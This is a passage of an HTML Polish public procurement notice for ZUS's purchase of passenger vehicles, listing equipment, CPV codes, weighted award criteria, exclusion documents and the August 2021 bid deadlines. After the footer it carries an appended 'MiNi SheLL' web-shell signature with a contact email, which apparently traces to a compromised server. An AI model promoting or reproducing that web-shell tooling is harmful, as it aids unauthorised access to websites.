przestrzeni ładunkowej pokryta wykładziną antypoślizgową lub matą lub tworzywem sztucznym, <br/>u)	podsufitka pokryta tkaniną na całej długości pojazdu, <br/>v)	poduszka powietrzna dla kierowcy i pasażera, <br/>w)	schowek w desce rozdzielczej po stronie pasażera, <br/>x)	system kontroli ciśnienia w oponach, <br/>y)	system przeciwdziałania poślizgowi kół napędowych podczas gwałtownego przyspieszania lub ruszania, <br/>z)	system nagłośnienia z co najmniej 2 głośnikami, <br/>aa)	system stabilizacji toru jazdy, <br/>bb)	system zapobiegający blokowaniu kół podczas hamowania, <br/>cc)	światła do jazdy dziennej, <br/>dd)	tempomat, <br/>ee)	trzecie światło stop, <br/>ff)	trzypunktowe pasy bezpieczeństwa z przodu i z tyłu, <br/>gg)	tuner radiowy fabryczny, <br/>hh)	wspomaganie układu kierowniczego,<br/>ii)	zestaw głośnomówiący fabryczny,<br/>jj)	koło zapasowe pełnowymiarowe lub koło dojazdowe wraz z zestawem narzędzi niezbędnym do jego wymiany zamontowane w pojeździe w sposób nieograniczający przestrzeni ładunkowej lub zamontowane pod pojazdem. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34115200-8 - Pojazdy silnikowe do transportu mniej niż 10 osób</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34100000-8 - Pojazdy silnikowe</p> <p class="mb-0">34110000-1 - Samochody osobowe</p> <p class="mb-0">34136000-9 - Samochody półciężarowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta, która uzyska<br/>najkorzystniejszy bilans przyjętych kryteriów obliczony według niżej podanego wzoru:<br/>O = C + Gw + Gn + Z<br/>gdzie:<br/>O – ocena łączna<br/>C – liczba punktów uzyskanych w kryterium Cena brutto oferty<br/>Gw – liczba punktów uzyskanych w kryterium Gwarancja na silnik, części mechaniczne, elektryczne, hydrauliczne i elementy wyposażenia<br/>Gn – liczba punktów uzyskanych w kryterium Gwarancja na perforację nadwozia<br/>Z – liczba punktów uzyskanych w kryterium Zużycie energii<br/><br/>Przyznawane punkty we wszystkich kryteriach będą zaokrąglane do dwóch miejsc po przecinku zgodnie z zasadami matematycznymi, tzn. jeżeli trzecie miejsce po przecinku wynosi od 0 do 4 to drugie miejsce po przecinku pozostaje niezmienione, jeżeli trzecie miejsce po przecinku wynosi od 5 do 9 to drugie miejsce po przecinku należy zaokrąglić w górę. <br/>W przypadku, gdy nie będzie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej oferty przedstawiają taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybierze ofertę z najniższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w określonym terminie ofert dodatkowych z zastrzeżeniem, że zaproponowana cena w ofertach dodatkowych nie może być wyższa niż cena w złożonej przez Wykonawcę ofercie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja na silnik, części mechaniczne, elektryczne, hydrauliczne i elementy wyposażenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja na perforację nadwozia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zużycie energii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	Oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu wstępnym, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w: art. 108 ust. 1 pkt 3 ustawy, art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji, art. 108 ust. 1 pkt 6 ustawy;<br/>2)	Oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021r. poz. 275) z innym Wykonawcą, który złożył odrębną ofertę/ofertę częściową, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty/oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej;<br/>3)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>4)	dokumenty wskazane powyżej w pkt. 1) – 3) odnoszące się do innych podmiotów na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej polega Wykonawca na zasadach określonych w art. 118 Ustawy pzp w celu wykazania braku istnienia wobec nich podstaw wykluczenia; <br/>5)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokumenty wskazane powyżej w pkt. 1) – 3) dotyczące każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w celu wykazania braku istnienia wobec niego podstaw wykluczenia,</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Na potwierdzenie spełnienia wymagań przez Przedmiot zamówienia określonych cech technicznych Zamawiający wymaga złożenia oświadczenia Wykonawcy potwierdzającego, że ofertowany pojazd spełnia wymagania techniczne wskazane w Opisie Przedmiotu Zamówienia – Załącznik nr 2a do SWZ lub Załącznik 2b do SWZ zależnie od zakresu postępowania którego dotyczy oferta. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Załącznik nr 2a do SWZ<br/>Załącznik nr 2b do SWZ <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) formularz ofertowy,<br/>2) aktualne na dzień składania ofert oświadczenie wstępne. <br/>3) zobowiązanie podmiotu udostępniającego zasoby do oddania do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów - jeżeli Wykonawca polega na zasobach lub sytuacji podmiotu<br/>trzeciego;<br/>4) oświadczenie o zastrzeżeniu informacji jako tajemnicy przedsiębiorstwa,<br/>5) w przypadku, gdy ofertę składają Wykonawcy wspólnie ubiegający się o udzielenie zamówienia - pełnomocnictwo określające zakres umocowania pełnomocnika ustanowionego do reprezentowania ich w postępowaniu, albo do reprezentowania w postępowaniu i zawarcia<br/>Umowy w sprawie zamówienia publicznego,<br/>6) w przypadku, gdy Wykonawcę reprezentuje pełnomocnik, do oferty należy załączyć odpowiednie pełnomocnictwo określające jego zakres, podpisane przez osobę/y upoważnione do reprezentacji wskazane we właściwym rejestrze, z którego wynika prawo do podpisania oferty oraz do podpisania innych dokumentów składanych wraz z ofertą a następnie wraz z plikami stanowiącymi ofertę skompresowane do jednego pliku archiwum .zip. Pełnomocnictwo<br/>może być również elektroniczną kopią poświadczoną za zgodność z oryginałem notarialnie lub elektroniczną kopią poświadczoną za zgodność z oryginałem przez osobę udzielającą pełnomocnictwa. Nie jest dopuszczalne poświadczenie za zgodność z oryginałem przez samego pełnomocnika, radcę prawnego lub adwokata; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia Umowy w sprawie zamówienia publicznego, załączają do oferty stosowne pełnomocnictwo.<br/>2. Wszelka korespondencja i rozliczenia dokonywane będą między Zamawiającym, a pełnomocnikiem, który uzyskał pełnomocnictwo od pozostałych Wykonawców występujących wspólnie.<br/>3. Wykonawcy składający wspólnie ofertę ponoszą solidarną odpowiedzialność za wykonanie Umowy.<br/>4. Oferta Wykonawców występujących wspólnie musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie.<br/>5. Warunki w zakresie niepodlegania wykluczeniu każdy z Wykonawców musi spełniać z osobna. W przypadku gdy wystąpi przesłanka wykluczenia jednego z uczestników konsorcjum, Zamawiający wykluczy z postępowania całe konsorcjum.<br/>6. Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający wymaga złożenia przed zawarciem Umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian został szczegółowo opisane w § 8 wzoru Umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-04 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma zakupowa https://portal.smartpzp.pl/zus</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-04 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-02</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-27 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com